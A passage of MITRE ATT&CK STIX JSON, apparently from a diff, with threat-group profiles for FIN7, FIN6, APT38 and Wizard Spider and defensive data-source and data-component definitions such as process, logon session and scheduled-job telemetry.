Labyrinth Chollima Feb 2022", + "description": "CrowdStrike. (2022, February 1). CrowdStrike Adversary Labyrinth Chollima. Retrieved February 1, 2022.", + "url": "https://web.archive.org/web/20210723190317/https://adversary.crowdstrike.com/en-US/adversary/labyrinth-chollima/" + }, + { + "source_name": "Novetta Blockbuster", + "description": "Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.", + "url": "https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + }, + { + "source_name": "Secureworks NICKEL ACADEMY Dec 2017", + "description": "Secureworks. (2017, December 15). Media Alert - Secureworks Discovers North Korean Cyber Threat Group, Lazarus, Spearphishing Financial Executives of Cryptocurrency Companies. Retrieved December 27, 2017.", + "url": "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing" + }, + { + "source_name": "Microsoft ZINC disruption Dec 2017", + "description": "Smith, B. (2017, December 19). Microsoft and Facebook disrupt ZINC malware attack to protect customers and the internet from ongoing cyberthreats. Retrieved December 20, 2017.", + "url": "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/" + }, + { + "source_name": "HIDDEN COBRA", + "description": "The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: US-CERT HOPLIGHT Apr 2019)" + }, + { + "source_name": "Treasury North Korean Cyber Groups September 2019", + "description": "US Treasury . (2019, September 13). Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups. Retrieved September 29, 2021.", + "url": "https://home.treasury.gov/news/press-releases/sm774" + }, + { + "source_name": "US-CERT HIDDEN COBRA June 2017", + "description": "US-CERT. (2017, June 13). Alert (TA17-164A) HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure. Retrieved July 13, 2017.", + "url": "https://www.us-cert.gov/ncas/alerts/TA17-164A" + }, + { + "source_name": "US-CERT HOPLIGHT Apr 2019", + "description": "US-CERT. (2019, April 10). MAR-10135536-8 – North Korean Trojan: HOPLIGHT. Retrieved April 19, 2019.", + "url": "https://www.us-cert.gov/ncas/analysis-reports/AR19-100A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T03:51:04.185Z", + "name": "FIN7", + "description": "[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)", + "aliases": [ + "FIN7", + "GOLD NIAGARA", + "ITG14", + "Carbon Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Edward Millington" + ], + "type": "intrusion-set", + "id": "intrusion-set--3753cc21-2dae-4dfb-8481-d004e74502cc", + "created": "2017-05-31T21:32:09.460Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0046", + "external_id": "G0046" + }, + { + "source_name": "Carbon Spider", + "description": "(Citation: CrowdStrike Carbon Spider August 2021)" + }, + { + "source_name": "FIN7", + "description": "(Citation: FireEye FIN7 March 2017) (Citation: FireEye FIN7 April 2017) (Citation: Morphisec FIN7 June 2017) (Citation: FireEye FIN7 Shim Databases) (Citation: FireEye FIN7 Aug 2018)" + }, + { + "source_name": "GOLD NIAGARA", + "description": "(Citation: Secureworks GOLD NIAGARA Threat Profile)" + }, + { + "source_name": "FireEye CARBANAK June 2017", + "description": "Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "FireEye FIN7 Aug 2018", + "description": "Carr, N., et al. (2018, August 01). On the Hunt for FIN7: Pursuing an Enigmatic and Evasive Global Criminal Operation. Retrieved August 23, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" + }, + { + "source_name": "Secureworks GOLD NIAGARA Threat Profile", + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-niagara" + }, + { + "source_name": "FireEye FIN7 Shim Databases", + "description": "Erickson, J., McWhirt, M., Palombo, D. (2017, May 3). To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence. Retrieved July 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html" + }, + { + "source_name": "Morphisec FIN7 June 2017", + "description": "Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.", + "url": "http://blog.morphisec.com/fin7-attacks-restaurant-industry" + }, + { + "source_name": "ITG14", + "description": "ITG14 shares campaign overlap with [FIN7](https://attack.mitre.org/groups/G0046).(Citation: IBM Ransomware Trends September 2020)" + }, + { + "source_name": "CrowdStrike Carbon Spider August 2021", + "description": "Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.", + "url": "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/" + }, + { + "source_name": "FireEye FIN7 March 2017", + "description": "Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.", + "url": "https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html" + }, + { + "source_name": "IBM Ransomware Trends September 2020", + "description": "Singleton, C. and Kiefer, C. (2020, September 28). Ransomware 2020: Attack Trends Affecting Organizations Worldwide. Retrieved September 20, 2021.", + "url": "https://securityintelligence.com/posts/ransomware-2020-attack-trends-new-techniques-affecting-organizations-worldwide/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T03:50:17.471Z", + "name": "FIN6", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)", + "aliases": [ + "FIN6", + "Magecart Group 6", + "ITG08", + "Skeleton Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.3", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Drew Church, Splunk" + ], + "type": "intrusion-set", + "id": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "created": "2017-05-31T21:32:06.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0037", + "external_id": "G0037" + }, + { + "source_name": "Skeleton Spider", + "description": "(Citation: Crowdstrike Global Threat Report Feb 2018)" + }, + { + "source_name": "FIN6", + "description": "(Citation: FireEye FIN6 April 2016)" + }, + { + "source_name": "Magecart Group 6", + "description": "(Citation: Security Intelligence ITG08 April 2020)" + }, + { + "source_name": "ITG08", + "description": "(Citation: Security Intelligence More Eggs Aug 2019)" + }, + { + "source_name": "Crowdstrike Global Threat Report Feb 2018", + "description": "CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.", + "url": "https://crowdstrike.lookbookhq.com/global-threat-report-2018-web/cs-2018-global-threat-report" + }, + { + "source_name": "FireEye FIN6 April 2016", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf" + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html" + }, + { + "source_name": "Security Intelligence ITG08 April 2020", + "description": "Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.", + "url": "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/" + }, + { + "source_name": "Security Intelligence More Eggs Aug 2019", + "description": "Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.", + "url": "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Modification", + "description": "Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--7b375092-3a61-448d-900a-77c9a4bde4dc", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Metadata", + "description": "Contextual data about a scheduled job, which may include information such as name, timing, command(s), etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:19:46.282Z", + "name": "User Account Authentication", + "description": "An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--0b4f86ed-f4ab-46a3-8ed1-175be1974da6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Metadata", + "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--faa34cf6-cf32-4dc9-bd6a-8f7a606ff65b", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Modification", + "description": "Changes made to a scheduled job, such as modifications to the execution launch (ex: Windows EID 4702 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "APT38", + "NICKEL GLADSTONE", + "BeagleBoyz", + "Bluenoroff", + "Stardust Chollima" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--00f67a77-86a4-4adf-be26-1a54fc713340", + "type": "intrusion-set", + "created": "2019-01-29T21:27:24.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0082", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0082" + }, + { + "source_name": "APT38", + "description": "(Citation: FireEye APT38 Oct 2018)" + }, + { + "source_name": "NICKEL GLADSTONE", + "description": "(Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)" + }, + { + "source_name": "BeagleBoyz", + "description": "(Citation: CISA AA20-239A BeagleBoyz August 2020)" + }, + { + "source_name": "Bluenoroff", + "description": "(Citation: Kaspersky Lazarus Under The Hood Blog 2017)" + }, + { + "source_name": "Stardust Chollima", + "description": "(Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)" + }, + { + "source_name": "CISA AA20-239A BeagleBoyz August 2020", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-239a", + "description": "DHS/CISA. (2020, August 26). FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks. Retrieved September 29, 2021." + }, + { + "source_name": "FireEye APT38 Oct 2018", + "url": "https://content.fireeye.com/apt/rpt-apt38", + "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018." + }, + { + "source_name": "DOJ North Korea Indictment Feb 2021", + "url": "https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and", + "description": "Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021." + }, + { + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/", + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017" + }, + { + "source_name": "SecureWorks NICKEL GLADSTONE profile Sept 2021", + "url": "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "description": "SecureWorks. (2021, September 29). NICKEL GLADSTONE Threat Profile. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike Stardust Chollima Profile April 2018", + "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "description": "Meyers, Adam. (2018, April 6). Meet CrowdStrike’s Adversary of the Month for April: STARDUST CHOLLIMA. Retrieved September 29, 2021." + }, + { + "source_name": "CrowdStrike GTR 2021 June 2021", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "description": "CrowdStrike. (2021, June 7). CrowdStrike 2021 Global Threat Report. Retrieved September 29, 2021." + } + ], + "modified": "2022-01-18T17:13:14.610Z", + "name": "APT38", + "description": "[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.", + "x_mitre_version": "2.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--3d6e6b3b-4aa8-40e1-8c47-91db0f313d9f", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Creation", + "description": "Initial construction of a drive letter or mount point to a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-22T05:44:27.289Z", + "name": "Wizard Spider", + "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is a Russia-based financially motivated threat group originally known for the creation and deployment of [TrickBot](https://attack.mitre.org/software/S0266) since at least 2016. [Wizard Spider](https://attack.mitre.org/groups/G0102) possesses a diverse arsenal of tools and has conducted ransomware campaigns against a variety of organizations, ranging from major corporations to hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: CrowdStrike Wizard Spider October 2020)", + "aliases": [ + "Wizard Spider", + "UNC1878", + "TEMP.MixMaster", + "Grim Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington", + "Oleksiy Gayda" + ], + "type": "intrusion-set", + "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7", + "created": "2020-05-12T18:15:29.396Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0102", + "external_id": "G0102" + }, + { + "source_name": "Grim Spider", + "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)" + }, + { + "source_name": "UNC1878", + "description": "(Citation: FireEye KEGTAP SINGLEMALT October 2020)" + }, + { + "source_name": "TEMP.MixMaster", + "description": "(Citation: FireEye Ryuk and Trickbot January 2019)" + }, + { + "source_name": "DHS/CISA Ransomware Targeting Healthcare October 2020", + "description": "DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-302a" + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "CrowdStrike Grim Spider May 2019", + "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/" + }, + { + "source_name": "FireEye KEGTAP SINGLEMALT October 2020", + "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html" + }, + { + "source_name": "CrowdStrike Wizard Spider October 2020", + "description": "Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.", + "url": "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-24T19:14:55.615Z", + "name": "Operational Databases", + "description": "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1b8c9f31-ad35-4850-bf8c-80c565ad3552", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0040", + "external_id": "DS0040" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-12-07T19:45:09.019Z", + "name": "Logon Session", + "description": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)", + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0028", + "external_id": "DS0028" + }, + { + "source_name": "Microsoft Audit Logon Events", + "description": "Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "modified": "2022-05-11T14:00:00.188Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": 